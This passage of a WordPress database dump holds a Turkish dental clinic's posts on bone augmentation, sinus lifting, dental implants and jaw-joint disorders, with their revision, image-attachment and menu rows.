(6373, 1, '2018-07-16 13:29:50', '2018-07-16 10:29:50', '[vc_row][vc_column][vc_column_text]<strong>Alveol Kemiği Ogmentasyonu (Genişletme)</strong>\r\n\r\nDiş çekimlerinden sonra, uzun dönemde karşılaşılan en büyük problemlerden biri çene kemiklerinde görülen erimedir. Diş kayıplarının tedavisi, implant uygulamaları ile giderilecekse kemik yüksekliği ve hacmi daha da önem kazanır.\r\nImplant uygulaması, belirli yükseklikte ve kalınlıkta kemik varlığını gerektirir.\r\n\r\nErken yaşta diş kayıpları ya da yoğun dişeti iltihabı sonucu kemik hacminde oluşan azalmaları kemik onarımları ile giderilebilir.\r\nBu onarımlar, hastaların kendi vücutlarından alınan kemik ile gerçekleştirilebildiği gibi, inorganik materyaller de aynı amaçla uygulanabilir.[/vc_column_text][/vc_column][/vc_row]', 'Kemik Ogmentasyon Operasyonu', '', 'publish', 'closed', 'closed', '', 'kemik-ogmentasyon-operasyonu', '', '', '2018-07-16 13:29:50', '2018-07-16 10:29:50', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6373', 0, 'us_portfolio', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6374, 1, '2018-07-16 13:29:41', '2018-07-16 10:29:41', '', 'kemik-ogmentasyon', '', 'inherit', 'closed', 'closed', '', 'kemik-ogmentasyon', '', '', '2018-07-16 13:29:41', '2018-07-16 10:29:41', '', 6373, 'http://www.ze-dent.com/wp-content/uploads/2018/07/kemik-ogmentasyon.jpg', 0, 'attachment', 'image/jpeg', 0),
(6375, 1, '2018-07-16 13:29:50', '2018-07-16 10:29:50', '[vc_row][vc_column][vc_column_text]<strong>Alveol Kemiği Ogmentasyonu (Genişletme)</strong>\r\n\r\nDiş çekimlerinden sonra, uzun dönemde karşılaşılan en büyük problemlerden biri çene kemiklerinde görülen erimedir. Diş kayıplarının tedavisi, implant uygulamaları ile giderilecekse kemik yüksekliği ve hacmi daha da önem kazanır.\r\nImplant uygulaması, belirli yükseklikte ve kalınlıkta kemik varlığını gerektirir.\r\n\r\nErken yaşta diş kayıpları ya da yoğun dişeti iltihabı sonucu kemik hacminde oluşan azalmaları kemik onarımları ile giderilebilir.\r\nBu onarımlar, hastaların kendi vücutlarından alınan kemik ile gerçekleştirilebildiği gibi, inorganik materyaller de aynı amaçla uygulanabilir.[/vc_column_text][/vc_column][/vc_row]', 'Kemik Ogmentasyon Operasyonu', '', 'inherit', 'closed', 'closed', '', '6373-revision-v1', '', '', '2018-07-16 13:29:50', '2018-07-16 10:29:50', '', 6373, 'http://www.ze-dent.com/6373-revision-v1/', 0, 'revision', '', 0),
(6376, 1, '2018-07-16 13:33:23', '2018-07-16 10:33:23', '[vc_row][vc_column][vc_column_text]<strong>Sinüs Lifting</strong>\r\n\r\nÜst çenelerde, dişlerin hemen üstünde bulunan anatomik boşluklara maksiller sinüs adı verilir. Maksiller sinüsler hayat boyu büyümelerini sürdürürler.\r\n\r\nSinüslerin hacmindeki artış, üst çenelerdeki kemik hacminde azalmaya yol açar. Fizyolojik olarak kabul edilebilecek bu kemik kayıpları, implant uygulamalarına olanak tanımayacak boyutlara ulaşabilir.\r\nBu durumda, eğer imlant terapisi uygulanacaksa, Sinüs Lifting adı verilen, sinüslerin hacmini azaltıp, kemik hacmini artırmaya yönelik özel bir cerrahi müdahale uygulanmalıdır.\r\n\r\nHastanın isteğine göre lokal ya da genel anestezi altında uygulanabilen bu operasyon ile çene kemiği ile sinüs mukozası arasına kemik partikülleri yerleştirilir ve takip eden altı aylık sürede kemik oluşumu beklenir.\r\nBu amaçla hastanın kendi vücudundan alınacak kemikler kullanılacağı gibi, kemik bankalarından elde edilecek kemik ya da inorganik materyaller de kullanılabilir. Kemik oluşumu tamamlandıktan sonra ise rutin implant uygulamalarına geçilir.[/vc_column_text][/vc_column][/vc_row]', 'Sinüs Lifting (Kaldırma)', '', 'publish', 'closed', 'closed', '', 'sinus-lifting-kaldirma', '', '', '2018-07-16 13:33:23', '2018-07-16 10:33:23', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6376', 0, 'us_portfolio', '', 0),
(6377, 1, '2018-07-16 13:33:11', '2018-07-16 10:33:11', '', 'sinus-lifting', '', 'inherit', 'closed', 'closed', '', 'sinus-lifting', '', '', '2018-07-16 13:33:11', '2018-07-16 10:33:11', '', 6376, 'http://www.ze-dent.com/wp-content/uploads/2018/07/sinus-lifting.jpg', 0, 'attachment', 'image/jpeg', 0),
(6378, 1, '2018-07-16 13:33:23', '2018-07-16 10:33:23', '[vc_row][vc_column][vc_column_text]<strong>Sinüs Lifting</strong>\r\n\r\nÜst çenelerde, dişlerin hemen üstünde bulunan anatomik boşluklara maksiller sinüs adı verilir. Maksiller sinüsler hayat boyu büyümelerini sürdürürler.\r\n\r\nSinüslerin hacmindeki artış, üst çenelerdeki kemik hacminde azalmaya yol açar. Fizyolojik olarak kabul edilebilecek bu kemik kayıpları, implant uygulamalarına olanak tanımayacak boyutlara ulaşabilir.\r\nBu durumda, eğer imlant terapisi uygulanacaksa, Sinüs Lifting adı verilen, sinüslerin hacmini azaltıp, kemik hacmini artırmaya yönelik özel bir cerrahi müdahale uygulanmalıdır.\r\n\r\nHastanın isteğine göre lokal ya da genel anestezi altında uygulanabilen bu operasyon ile çene kemiği ile sinüs mukozası arasına kemik partikülleri yerleştirilir ve takip eden altı aylık sürede kemik oluşumu beklenir.\r\nBu amaçla hastanın kendi vücudundan alınacak kemikler kullanılacağı gibi, kemik bankalarından elde edilecek kemik ya da inorganik materyaller de kullanılabilir. Kemik oluşumu tamamlandıktan sonra ise rutin implant uygulamalarına geçilir.[/vc_column_text][/vc_column][/vc_row]', 'Sinüs Lifting (Kaldırma)', '', 'inherit', 'closed', 'closed', '', '6376-revision-v1', '', '', '2018-07-16 13:33:23', '2018-07-16 10:33:23', '', 6376, 'http://www.ze-dent.com/6376-revision-v1/', 0, 'revision', '', 0),
(6379, 1, '2018-07-16 13:39:33', '2018-07-16 10:39:33', '[vc_row][vc_column][vc_column_text]<strong>Implantlar ve Protezler</strong>\r\n\r\nGünümüzde diş implantları, tartışmasız olarak doğal dişlere en iyi alternatiftir.\r\nGeleneksel köprü ve protezlere göre daha iyi konuşma ve çiğneme fonksiyonu sağlarken, yüzünüzde doğal bir görünümü de beraberinde getirir.\r\nBugün implantın, 21. yüzyılda üzerinde en çok çalışılacak olan diş tedavi şekli olduğu anlaşılmaktadır. Doğru teşhis, yeterli bilgi, tecrübe ve ekipmanla uygulandığında diş implantı, hasta ve hekim açısından olağanüstü başarılı sonuçlar verebilen bir tedavi şeklidir.\r\n\r\n<strong><img class=\"alignnone size-medium wp-image-6380\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/implant2-300x201.jpeg\" alt=\"\" width=\"300\" height=\"201\" /><img class=\"alignnone size-medium wp-image-6381\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/implant5-300x199.jpeg\" alt=\"\" width=\"300\" height=\"199\" /></strong>\r\n\r\n<strong>İmplant tedavisi uygulandığı vaka’lar ve sağladıgı avantajları</strong>\r\n<ol>\r\n 	<li><strong>Alt çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Bu hastalar protezin hareketine bağlı olarak sürekli ağrıdan (vuruk) ve iyi çiğneyememekten şikayetçidirler. Bu şikayet zaman içinde proteze destek olan kemik dokunun erimesi ile daha da artar hale gelir. Bu tip hastalarda implant tedavisi yukarıdaki tüm şikayetleri ortadan kaldırdığı gibi kemiğin erimesini de durdurmaktadır.</li>\r\n 	<li><strong>Üst çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Üst protezler alt çene protezlerine oranla daha stabil olsalar da protezin damağı kapatan tasarımı tat alma duygusunu azaltıp mide bulantısına neden olabilmektedir.</li>\r\n 	<li><strong>Alt ya da üst çenede dişlerinin bir kısmını kaybetmiş hastalar:</strong> Bu hastaların şikayeti kancalarla tutunan protezin çirkin görüntüsü, ya da köprü yapılabilmesi için sağlam dişlerini kestirme zorunluluğu olarak sayılabilir.</li>\r\n 	<li><strong>Tek dişini kaybetmiş hastalar:</strong> Bu hastalar tek bir dişin restorasyonu için en az komşu iki dişi feda etmek zorunda olan hastalardır. Tek bir implant’ın yerleştirilmesi komşu dişleri kurtardığı gibi daha estetik ve fonksiyonel sonuçların ortaya çıkmasına da neden olur.</li>\r\n</ol>\r\n[/vc_column_text][/vc_column][/vc_row]', 'İmplantlar ve Protezler', '', 'publish', 'closed', 'closed', '', 'implantlar-ve-protezler', '', '', '2018-07-16 15:33:49', '2018-07-16 12:33:49', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6379', 0, 'us_portfolio', '', 0),
(6380, 1, '2018-07-16 13:39:01', '2018-07-16 10:39:01', '', 'implant2', '', 'inherit', 'closed', 'closed', '', 'implant2', '', '', '2018-07-16 13:39:01', '2018-07-16 10:39:01', '', 6379, 'http://www.ze-dent.com/wp-content/uploads/2018/07/implant2.jpeg', 0, 'attachment', 'image/jpeg', 0),
(6381, 1, '2018-07-16 13:39:03', '2018-07-16 10:39:03', '', 'implant5', '', 'inherit', 'closed', 'closed', '', 'implant5', '', '', '2018-07-16 13:39:03', '2018-07-16 10:39:03', '', 6379, 'http://www.ze-dent.com/wp-content/uploads/2018/07/implant5.jpeg', 0, 'attachment', 'image/jpeg', 0),
(6382, 1, '2018-07-16 13:39:33', '2018-07-16 10:39:33', '[vc_row][vc_column][vc_column_text]<strong>Implantlar ve Protezler</strong>\r\n\r\nGünümüzde diş implantları, tartışmasız olarak doğal dişlere en iyi alternatiftir.\r\nGeleneksel köprü ve protezlere göre daha iyi konuşma ve çiğneme fonksiyonu sağlarken, yüzünüzde doğal bir görünümü de beraberinde getirir.\r\nBugün implantın, 21. yüzyılda üzerinde en çok çalışılacak olan diş tedavi şekli olduğu anlaşılmaktadır. Doğru teşhis, yeterli bilgi, tecrübe ve ekipmanla uygulandığında diş implantı, hasta ve hekim açısından olağanüstü başarılı sonuçlar verebilen bir tedavi şeklidir.\r\n\r\n<strong><img class=\"alignnone size-medium wp-image-6380\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/implant2-300x201.jpeg\" alt=\"\" width=\"300\" height=\"201\" /><img class=\"alignnone size-medium wp-image-6381\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/implant5-300x199.jpeg\" alt=\"\" width=\"300\" height=\"199\" /></strong>\r\n\r\n<strong>İmplant tedavisi uygulandığı vaka’lar ve sağladıgı avantajları</strong>\r\n<ol>\r\n 	<li><strong>Alt çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Bu hastalar protezin hareketine bağlı olarak sürekli ağrıdan (vuruk) ve iyi çiğneyememekten şikayetçidirler. Bu şikayet zaman içinde proteze destek olan kemik dokunun erimesi ile daha da artar hale gelir. Bu tip hastalarda implant tedavisi yukarıdaki tüm şikayetleri ortadan kaldırdığı gibi kemiğin erimesini de durdurmaktadır.</li>\r\n 	<li><strong>Üst çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Üst protezler alt çene protezlerine oranla daha stabil olsalar da protezin damağı kapatan tasarımı tat alma duygusunu azaltıp mide bulantısına neden olabilmektedir.</li>\r\n 	<li><strong>Alt ya da üst çenede dişlerinin bir kısmını kaybetmiş hastalar:</strong> Bu hastaların şikayeti kancalarla tutunan protezin çirkin görüntüsü, ya da köprü yapılabilmesi için sağlam dişlerini kestirme zorunluluğu olarak sayılabilir.</li>\r\n 	<li><strong>Tek dişini kaybetmiş hastalar:</strong> Bu hastalar tek bir dişin restorasyonu için en az komşu iki dişi feda etmek zorunda olan hastalardır. Tek bir implant’ın yerleştirilmesi komşu dişleri kurtardığı gibi daha estetik ve fonksiyonel sonuçların ortaya çıkmasına da neden olur.</li>\r\n</ol>\r\n[/vc_column_text][/vc_column][/vc_row]', 'İmplantlar ve Protezler', '', 'inherit', 'closed', 'closed', '', '6379-revision-v1', '', '', '2018-07-16 13:39:33', '2018-07-16 10:39:33', '', 6379, 'http://www.ze-dent.com/6379-revision-v1/', 0, 'revision', '', 0),
(6383, 1, '2018-07-16 13:43:51', '2018-07-16 10:43:51', '[vc_row][vc_column][vc_column_text]<strong>Implant </strong>\r\n\r\nImplant, eksik olan dişlerin fonksiyon ve estetiğini tekrar sağlamak amacıyla çene kemiğine yerleştirilen ve doku dostu olan titanyum vb. değerli maddelerden yapılan üstün teknoloji ürünü yapay diş kökleridir.\r\n\r\nGünümüzde doğal dişlere en iyi alternatif çözüm getiren tartışmasız sistemlerin ilkidir. Dişleri fonksiyon, estetik ve anatomik olarak en ideal taklit edebilen implant sistemleri sıklıkla kullanılır hale gelmiştir.\r\n\r\nGerek tek diş eksikliklerinde gerekse fazla diş kayıplarında implant sistemleri estetiğin sağlamlıkla birlikte kazanımında vazgeçilmez unsurlar olmuşlardır. Özellikle arka bölgedeki son dişlerin kayıplarında ortaya çıkan ve köprü gibi küçük, kullanımı kolay protezlerin yapılamayıp daha büyük damakları içine alan hareketli protezlerin kullanımına en iyi alternatif çözüm olmaları en büyük estetik avantajlarıdır.\r\n\r\nBirçoğumuzun korkulu rüyası haline gelen damak protez kullanma zorunluluğudur. Takıp çıkartılabilen bu büyük hacimli protezlerle konuşurken ağızdan çıkabilir endişesini taşımak, gülümserken bağlantı metallerinin estetik olmayan görünümü, yemek davetlerinde karşılaşılabilecek olumsuz tecrübelerden sakınma zorunluluğu, iletişim ve özgüven duyusunu kaybetmeye neden olmaktadır. 21.yüzyılda dişhekimliği araştırmalarında büyük önem taşıyan implant sistemleri hareketli damak protezlerinden kurtulma şansını bizlere tanıyor artık…\r\n\r\n<strong><img src=\"http://localhost/zdent/implant-dis-ekme/wp-content/uploads/2012/07/implant4.jpeg\" alt=\"\" />Titanyum esaslı implantlar</strong>\r\n\r\nGünümüzde kullanılan dental implantların neredeyse tamamı titanyum esaslıdır. Titanyum doğada reaktif olarak bulunur. Birlikte kullanıldığı maddeye kolayca uyum sağladığı için, vücudun normalde yabancı maddelere karşı geliştirdiği iltihabi veya alerjik reaksiyonlar titanyum ile gerçekleşmez. Bilinen en doku dostu materyal olan titanyum, modern tıpta vücuda yerleştirilen metal esaslı yapıların tamamının yapımında kullanılır.\r\n\r\n<strong>Implant uygulama alanları</strong>\r\n\r\nAğzındaki diş eksikliklerinin giderilmesini isteyen ve bazı kriterlere sahip olan herkese implant yapılabilir. Bu kriterlerden biri eksik diş veya dişlerin olduğu bölgedeki kemiğin durumudur. Implantın sağlam ve sağlıklı olarak yerleşip tutunabilmesi için bu bölgede yeterli kemik yüksekliği bulunmalıdır. Ayrıca hastanın ağız bakımı iyi olmalı, dişeti problemleri ve iyileşmeyi olumsuz etkileyecek bir rahatsızlığı bulunmamalıdır. Dental implant uygulamaları için üst yaş sınırı yoktur. Alt sınır ise büyüme ve gelişimin tamamlandığı yıllardır.\r\n\r\nImplant uygulamaları için en önemli kriter, yerleştirilmesi planlanan bölgede yeterli miktar ve kalitede kemik dokusunun bulunmasıdır. Ayrıca bazı anatomik oluşumların implant yerleştirilmesini engeller konumda olmaması gerekir. (Bölgenin implant yerleştirilmesine uygun hale getirilmesi için uygulanan rejeneratif ve rekonstüktif, ileri implantoloji teknikleri ile ilgili doktorunuzdan detaylı bilgi edinebilirsiniz.)\r\n\r\n<strong>Implantolojinin avantajları</strong>\r\n\r\nİlk uygulamaları yaklaşık 30 yıl öncesine dayanan dental implantoloji, doğru planlama, kusursuz sterilizasyon ve cerrahi teknik, mükemmel protetik uygulama ile biraraya geldiğinde %95 başarı ile uygulanan, güvenilirliğini ispat etmiş bir yöntemdir. Avantajlarını şöyle sıralayabiliriz:\r\n<ul>\r\n 	<li>Klasik köprü protezlerinde komşu dişlerin küçültülmeleri sonucu dişlerde oluşan hasar, implant uygulamalarında önlenmiş olur.</li>\r\n 	<li>Sabit protez yaptırma şansını kaybederek, hareketli proteze mahkum olan bireyler, implant uygulamaları sayesinde sabit dişlere sahip olabilirler.</li>\r\n 	<li>Üst çene total dişsizlik vakalarında, total protezin (damak) implantla desteklenmesi sayesinde damağı tamamen örtmeyen dolayısı ile bulantıya yol açmayan, tat kaybına neden olmayan daha sağlıklı protez uygulamaları yapılabilir.</li>\r\n 	<li>Silikleşmiş çene kemiği nedeni ile protezleri ağızlarında aşırı oynayan ve bu nedenle rahat fonksiyon göremeyen hatta konuşamayan bireylerin protezleri implant destekli hale getirilerek stabil kılınabilir.</li>\r\n 	<li>Diş çekimini takiben çene kemiklerinde oluşan rezorbsiyon (erime) implant uygulamaları sonrasında önemli miktarda önlenmiş olur.</li>\r\n 	<li>İyi fonksiyon görebilen, çok daha estetik sonuçlar elde edilen protezler ile bireyler her istediklerini yiyebilir, özgürce gülebilir, kahkaha atabilir, öpüşebilir, yeniden kazandıkları özgüvenleri ile belki de ihmal ettikleri sosyal hayatlarını doya doya yaşayabilirler.</li>\r\n</ul>\r\n<strong>Implant uygulamasının dezavantajları</strong>\r\n\r\nDental implant uygulamalarında başlangıç-bitiş dönemi arasında 6-12 hafta gibi bir süreye ihtiyaç duyulur. Rejeneratif ve rekonstrüktif tekniklerin gerektiği vakalarda bu süre iki katına kadar çıkabilir. (Son yıllarda yürütülen araştırmalarda elde edilen bulgular ışığında, bazı özel durumlarda implantın yerleştirilmesini takiben aynı gün üzerine protetik yapının yerleştirilebileceği anlaşılmıştır. ‘İmmediat yükleme olarak adlandırılan bu konsept ile ilgili olarak diş doktorunuzdan daha detaylı bilgi alabilirsiniz.)\r\n\r\nDental implant uygulamaları, klasik protez uygulamalarına göre daha pahalı uygulamalardır. Implant satın alınırken ödenen ücretin önemli bir kısmı tüm dünyada bu konuda yoğun bir şekilde yürütülen çalışmalara harcanmaktadır. Çok araştırılmamış, sisteminin kusursuzluğunu iyi sorgulamamış implant markaları daha ucuz olsa da güvenilirlikleri tam değildir.\r\n\r\n<strong>Implant uygulamasının aşamaları</strong>\r\n\r\nDental implant uygulamasının ilk aşaması, implantın çene kemiği içerisine yerleştirilmesidir. Tamamen dişeti altında bırakılan implantın kemik ile kaynaşması (osteointegrasyon) için geçmesi gereken süre 6-12 haftadır. Bu sürenin tamamlanmasından sonra ikinci aşamada çok küçük bir müdahale ile implantı örten dişetine 3-4 mm çapında bir kapak açılarak implantın üstüne yapay dişlere destek olacak küçük metal destekler yerleştirilir. Dişetinin şekillenmesi için geçen 1-2 hafta sonrasında ölçü alınarak rutin protez işlemlerine başlanabilir.\r\n\r\n<strong>Implant operasyonu-ağrı ilişkisi</strong>\r\n\r\nDental implantlar, implant başına ortalama 20 dakika süren, hastanın uyutulmadığı, lokal anestezi kullanılarak gerçekleştirilen müdahalelerle yerleştirilir. Bu amaçla bölgedeki herhangi bir dişe yapılacak basit bir dolgu için kullanılan lokal anestezik aynı miktarda tatbik edilir.\r\n\r\n<strong>Implant operasyonu sonrası…</strong>\r\n\r\nİmplant operasyonu, dokular üzerinde basit bir diş çekimi ile hemen hemen aynı etkiye sahiptir. Yerleştirilen implantın aşırı yükten korunması için bir kaç gün boyunca daha yumuşak besinler ve sıvı gıdalarla beslenmek gerekebilir. Bu konuda gerekli uyarıları dişhekiminiz yapacaktır.[/vc_column_text][/vc_column][/vc_row]', 'İmplant', '', 'publish', 'closed', 'closed', '', 'implant', '', '', '2018-07-16 13:43:51', '2018-07-16 10:43:51', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6383', 0, 'us_portfolio', '', 0),
(6384, 1, '2018-07-16 13:43:35', '2018-07-16 10:43:35', '', 'implant', '', 'inherit', 'closed', 'closed', '', 'implant-2', '', '', '2018-07-16 13:43:35', '2018-07-16 10:43:35', '', 6383, 'http://www.ze-dent.com/wp-content/uploads/2018/07/implant-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(6385, 1, '2018-07-16 13:43:51', '2018-07-16 10:43:51', '[vc_row][vc_column][vc_column_text]<strong>Implant </strong>\r\n\r\nImplant, eksik olan dişlerin fonksiyon ve estetiğini tekrar sağlamak amacıyla çene kemiğine yerleştirilen ve doku dostu olan titanyum vb. değerli maddelerden yapılan üstün teknoloji ürünü yapay diş kökleridir.\r\n\r\nGünümüzde doğal dişlere en iyi alternatif çözüm getiren tartışmasız sistemlerin ilkidir. Dişleri fonksiyon, estetik ve anatomik olarak en ideal taklit edebilen implant sistemleri sıklıkla kullanılır hale gelmiştir.\r\n\r\nGerek tek diş eksikliklerinde gerekse fazla diş kayıplarında implant sistemleri estetiğin sağlamlıkla birlikte kazanımında vazgeçilmez unsurlar olmuşlardır. Özellikle arka bölgedeki son dişlerin kayıplarında ortaya çıkan ve köprü gibi küçük, kullanımı kolay protezlerin yapılamayıp daha büyük damakları içine alan hareketli protezlerin kullanımına en iyi alternatif çözüm olmaları en büyük estetik avantajlarıdır.\r\n\r\nBirçoğumuzun korkulu rüyası haline gelen damak protez kullanma zorunluluğudur. Takıp çıkartılabilen bu büyük hacimli protezlerle konuşurken ağızdan çıkabilir endişesini taşımak, gülümserken bağlantı metallerinin estetik olmayan görünümü, yemek davetlerinde karşılaşılabilecek olumsuz tecrübelerden sakınma zorunluluğu, iletişim ve özgüven duyusunu kaybetmeye neden olmaktadır. 21.yüzyılda dişhekimliği araştırmalarında büyük önem taşıyan implant sistemleri hareketli damak protezlerinden kurtulma şansını bizlere tanıyor artık…\r\n\r\n<strong><img src=\"http://localhost/zdent/implant-dis-ekme/wp-content/uploads/2012/07/implant4.jpeg\" alt=\"\" />Titanyum esaslı implantlar</strong>\r\n\r\nGünümüzde kullanılan dental implantların neredeyse tamamı titanyum esaslıdır. Titanyum doğada reaktif olarak bulunur. Birlikte kullanıldığı maddeye kolayca uyum sağladığı için, vücudun normalde yabancı maddelere karşı geliştirdiği iltihabi veya alerjik reaksiyonlar titanyum ile gerçekleşmez. Bilinen en doku dostu materyal olan titanyum, modern tıpta vücuda yerleştirilen metal esaslı yapıların tamamının yapımında kullanılır.\r\n\r\n<strong>Implant uygulama alanları</strong>\r\n\r\nAğzındaki diş eksikliklerinin giderilmesini isteyen ve bazı kriterlere sahip olan herkese implant yapılabilir. Bu kriterlerden biri eksik diş veya dişlerin olduğu bölgedeki kemiğin durumudur. Implantın sağlam ve sağlıklı olarak yerleşip tutunabilmesi için bu bölgede yeterli kemik yüksekliği bulunmalıdır. Ayrıca hastanın ağız bakımı iyi olmalı, dişeti problemleri ve iyileşmeyi olumsuz etkileyecek bir rahatsızlığı bulunmamalıdır. Dental implant uygulamaları için üst yaş sınırı yoktur. Alt sınır ise büyüme ve gelişimin tamamlandığı yıllardır.\r\n\r\nImplant uygulamaları için en önemli kriter, yerleştirilmesi planlanan bölgede yeterli miktar ve kalitede kemik dokusunun bulunmasıdır. Ayrıca bazı anatomik oluşumların implant yerleştirilmesini engeller konumda olmaması gerekir. (Bölgenin implant yerleştirilmesine uygun hale getirilmesi için uygulanan rejeneratif ve rekonstüktif, ileri implantoloji teknikleri ile ilgili doktorunuzdan detaylı bilgi edinebilirsiniz.)\r\n\r\n<strong>Implantolojinin avantajları</strong>\r\n\r\nİlk uygulamaları yaklaşık 30 yıl öncesine dayanan dental implantoloji, doğru planlama, kusursuz sterilizasyon ve cerrahi teknik, mükemmel protetik uygulama ile biraraya geldiğinde %95 başarı ile uygulanan, güvenilirliğini ispat etmiş bir yöntemdir. Avantajlarını şöyle sıralayabiliriz:\r\n<ul>\r\n 	<li>Klasik köprü protezlerinde komşu dişlerin küçültülmeleri sonucu dişlerde oluşan hasar, implant uygulamalarında önlenmiş olur.</li>\r\n 	<li>Sabit protez yaptırma şansını kaybederek, hareketli proteze mahkum olan bireyler, implant uygulamaları sayesinde sabit dişlere sahip olabilirler.</li>\r\n 	<li>Üst çene total dişsizlik vakalarında, total protezin (damak) implantla desteklenmesi sayesinde damağı tamamen örtmeyen dolayısı ile bulantıya yol açmayan, tat kaybına neden olmayan daha sağlıklı protez uygulamaları yapılabilir.</li>\r\n 	<li>Silikleşmiş çene kemiği nedeni ile protezleri ağızlarında aşırı oynayan ve bu nedenle rahat fonksiyon göremeyen hatta konuşamayan bireylerin protezleri implant destekli hale getirilerek stabil kılınabilir.</li>\r\n 	<li>Diş çekimini takiben çene kemiklerinde oluşan rezorbsiyon (erime) implant uygulamaları sonrasında önemli miktarda önlenmiş olur.</li>\r\n 	<li>İyi fonksiyon görebilen, çok daha estetik sonuçlar elde edilen protezler ile bireyler her istediklerini yiyebilir, özgürce gülebilir, kahkaha atabilir, öpüşebilir, yeniden kazandıkları özgüvenleri ile belki de ihmal ettikleri sosyal hayatlarını doya doya yaşayabilirler.</li>\r\n</ul>\r\n<strong>Implant uygulamasının dezavantajları</strong>\r\n\r\nDental implant uygulamalarında başlangıç-bitiş dönemi arasında 6-12 hafta gibi bir süreye ihtiyaç duyulur. Rejeneratif ve rekonstrüktif tekniklerin gerektiği vakalarda bu süre iki katına kadar çıkabilir. (Son yıllarda yürütülen araştırmalarda elde edilen bulgular ışığında, bazı özel durumlarda implantın yerleştirilmesini takiben aynı gün üzerine protetik yapının yerleştirilebileceği anlaşılmıştır. ‘İmmediat yükleme olarak adlandırılan bu konsept ile ilgili olarak diş doktorunuzdan daha detaylı bilgi alabilirsiniz.)\r\n\r\nDental implant uygulamaları, klasik protez uygulamalarına göre daha pahalı uygulamalardır. Implant satın alınırken ödenen ücretin önemli bir kısmı tüm dünyada bu konuda yoğun bir şekilde yürütülen çalışmalara harcanmaktadır. Çok araştırılmamış, sisteminin kusursuzluğunu iyi sorgulamamış implant markaları daha ucuz olsa da güvenilirlikleri tam değildir.\r\n\r\n<strong>Implant uygulamasının aşamaları</strong>\r\n\r\nDental implant uygulamasının ilk aşaması, implantın çene kemiği içerisine yerleştirilmesidir. Tamamen dişeti altında bırakılan implantın kemik ile kaynaşması (osteointegrasyon) için geçmesi gereken süre 6-12 haftadır. Bu sürenin tamamlanmasından sonra ikinci aşamada çok küçük bir müdahale ile implantı örten dişetine 3-4 mm çapında bir kapak açılarak implantın üstüne yapay dişlere destek olacak küçük metal destekler yerleştirilir. Dişetinin şekillenmesi için geçen 1-2 hafta sonrasında ölçü alınarak rutin protez işlemlerine başlanabilir.\r\n\r\n<strong>Implant operasyonu-ağrı ilişkisi</strong>\r\n\r\nDental implantlar, implant başına ortalama 20 dakika süren, hastanın uyutulmadığı, lokal anestezi kullanılarak gerçekleştirilen müdahalelerle yerleştirilir. Bu amaçla bölgedeki herhangi bir dişe yapılacak basit bir dolgu için kullanılan lokal anestezik aynı miktarda tatbik edilir.\r\n\r\n<strong>Implant operasyonu sonrası…</strong>\r\n\r\nİmplant operasyonu, dokular üzerinde basit bir diş çekimi ile hemen hemen aynı etkiye sahiptir. Yerleştirilen implantın aşırı yükten korunması için bir kaç gün boyunca daha yumuşak besinler ve sıvı gıdalarla beslenmek gerekebilir. Bu konuda gerekli uyarıları dişhekiminiz yapacaktır.[/vc_column_text][/vc_column][/vc_row]', 'İmplant', '', 'inherit', 'closed', 'closed', '', '6383-revision-v1', '', '', '2018-07-16 13:43:51', '2018-07-16 10:43:51', '', 6383, 'http://www.ze-dent.com/6383-revision-v1/', 0, 'revision', '', 0),
(6386, 1, '2018-07-16 13:50:12', '2018-07-16 10:50:12', ' ', '', '', 'publish', 'closed', 'closed', '', '6386', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6386', 13, 'nav_menu_item', '', 0),
(6387, 1, '2018-07-16 13:50:12', '2018-07-16 10:50:12', ' ', '', '', 'publish', 'closed', 'closed', '', '6387', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6387', 14, 'nav_menu_item', '', 0),
(6388, 1, '2018-07-16 13:50:12', '2018-07-16 10:50:12', ' ', '', '', 'publish', 'closed', 'closed', '', '6388', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6388', 15, 'nav_menu_item', '', 0),
(6389, 1, '2018-07-16 13:50:12', '2018-07-16 10:50:12', ' ', '', '', 'publish', 'closed', 'closed', '', '6389', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6389', 16, 'nav_menu_item', '', 0),
(6390, 1, '2018-07-16 13:58:26', '2018-07-16 10:58:26', '[vc_row][vc_column][vc_column_text]<strong>Temporomandibuler Eklem (Alt Çene Eklemi) Bozuklukları</strong>\r\n\r\nTemporomandibuler Eklem (TME, Alt çene eklemi) çiğneme kaslarını tutan ağrı ve fonksiyon bozukluğu sendromudur. Eklem yüzeyi ve disk arasındaki uyum bozulmuştur. Çene eklemi bozuklukları, günümüzde yaygın bir kesimi etkisi altına almış durumdadır.\r\n\r\n<strong>TME bozukluklarının belirtileri:</strong>\r\n<ul>\r\n 	<li>Ağız açma sırasında ağrı</li>\r\n 	<li>Ağız açıp kapatırken gıcırdama, klik, tıkırtı sesi</li>\r\n 	<li>Ağız açmada kısıtlılık veya kilitlenme</li>\r\n 	<li>Boyunda ağrı veya sertlik</li>\r\n 	<li>Baş ağrısı (Migren ağrısı ile karıştırılır)</li>\r\n 	<li>Çiğneme sırasında ağrı</li>\r\n 	<li>Yüzde ağrı</li>\r\n 	<li>Dişleri birbiri üstüne kapatırken ağrı</li>\r\n 	<li>Çiğneme sırasında çenede yorgunluk hissi</li>\r\n 	<li>Genellikle sabahları kalkınca çeneyi 